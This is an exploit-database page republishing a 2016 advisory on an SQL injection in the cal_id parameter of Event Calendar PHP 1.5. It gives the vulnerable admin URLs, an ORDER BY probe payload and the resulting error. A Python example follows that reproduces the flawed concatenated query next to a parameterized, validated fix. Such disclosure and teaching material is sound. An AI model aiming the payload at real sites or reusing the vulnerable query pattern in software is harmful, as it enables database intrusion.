CVE | Category | Price | Severity |
---|---|---|---|
N/A | CWE-89: Improper Neutralization of Special Elements used in an SQL Command ('SQL Injection') | Not available | Unknown |
Author | Risk | Exploitation Type | Date |
---|---|---|---|
Not specified | Unknown | Remote | 2016-10-22 |
CVSS | EPSS | EPSSP |
---|---|---|
CVSS:4.0/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:L | 0.02192 | 0.50148 |
Event Calendar PHP 1.5 SQL Injection

=====================================================
# Event Calendar PHP 1.5 - SQL Injection
=====================================================
# Vendor Homepage: http://eventcalendarphp.com/
# Date: 21 Oct 2016
# Demo Link : http://eventcalendarphp.com/eventcalendar/admin.php
# Version : 1.5
# Platform : WebApp - PHP
# Author: Ashiyane Digital Security Team
# Contact: [email protected]
=====================================================
# PoC:

Vulnerable Url:
http://eventcalendarphp.com/eventcalendar/admin.php?act=options&cal_id=[payload]
http://eventcalendarphp.com/eventcalendar/admin.php?act=cal_options&cal_id=[payload]
http://eventcalendarphp.com/eventcalendar/admin.php?act=cal_language&cal_id=[payload]

Vulnerable parameter : cal_id
Method : GET

A simple inject :
Payload : '+order+by+20--+
http://eventcalendarphp.com/eventcalendar/admin.php?act=options&cal_id=1'+order+by+20--+

In the response the result can be seen:
query error: SELECT * FROM pa_ecal_calendars WHERE cal_id='1' order by 20-- '. Error: Unknown column '20' in 'order clause'

Result of payload: Error: Unknown column '20' in 'order clause'
=====================================================
# Discovered By : Ehsan Hosseini
=====================================================
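The echoed query above shows the root cause: the `cal_id` value is spliced straight into the SQL text, so a quote in the parameter ends the literal and the rest is parsed as SQL. The following is an added illustration, not code from the advisory or from the Event Calendar PHP project: it reconstructs that flawed pattern as a hypothetical function, puts the parameterized and input-validated version next to it, and runs both against the page's own payload. The schema of `pa_ecal_calendars` is an assumption (only the table name appears on the page), and an in-memory SQLite database stands in for MySQL, so the error text differs from the `Unknown column '20'` message in the advisory while the mechanism is the same.

```python
import sqlite3

# Constructed stand-in for the application's calendar table. The real schema
# is not on the page; only the table name pa_ecal_calendars is.
def make_db():
    conn = sqlite3.connect(":memory:")
    conn.execute(
        "CREATE TABLE pa_ecal_calendars (cal_id INTEGER PRIMARY KEY, cal_name TEXT)"
    )
    conn.executemany(
        "INSERT INTO pa_ecal_calendars VALUES (?, ?)", [(1, "Main"), (2, "Staff")]
    )
    return conn


def lookup_vulnerable(conn, cal_id):
    # Hypothetical reconstruction of the flawed pattern: the raw GET value is
    # formatted into the query string, so a quote character in it changes the
    # structure of the statement instead of being treated as data.
    sql = "SELECT * FROM pa_ecal_calendars WHERE cal_id='%s'" % cal_id
    return conn.execute(sql).fetchall()


def parse_cal_id(raw):
    # Defense in depth: cal_id is an identifier, so reject anything that is
    # not a non-negative integer before it reaches the database layer.
    value = int(raw)  # raises ValueError for "1' order by 20-- "
    if value < 0:
        raise ValueError("cal_id must be non-negative")
    return value


def lookup_safe(conn, cal_id):
    # Parameterized query: the value is bound by the driver and never parsed
    # as SQL, so the payload simply matches no row.
    sql = "SELECT * FROM pa_ecal_calendars WHERE cal_id=?"
    return conn.execute(sql, (cal_id,)).fetchall()


# The payload from the advisory, URL-decoded ('+' is a space in a query string).
PAYLOAD = "1' order by 20-- "


def demo():
    """Run the same payload through both functions and report the outcomes."""
    conn = make_db()
    try:
        lookup_vulnerable(conn, PAYLOAD)
        vuln_outcome = "no error"
    except sqlite3.OperationalError as exc:
        # Error-based evidence of injection: ORDER BY 20 on a 2-column table.
        vuln_outcome = "error: %s" % exc
    safe_rows = lookup_safe(conn, PAYLOAD)
    return vuln_outcome, safe_rows


if __name__ == "__main__":
    outcome, rows = demo()
    print("vulnerable query ->", outcome)
    print("parameterized query ->", rows)
    try:
        parse_cal_id(PAYLOAD)
    except ValueError as exc:
        print("validation rejects payload:", exc)
```

The important difference is not that the safe query avoids an error message but that the bound value cannot alter the statement at all; the `ORDER BY` probe only produces a database error in the vulnerable version because the quote terminated the literal. Validating `cal_id` as an integer before the query is a second, independent layer that also keeps malformed input out of logs and error output.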
Copyright ©2024 Exploitalert.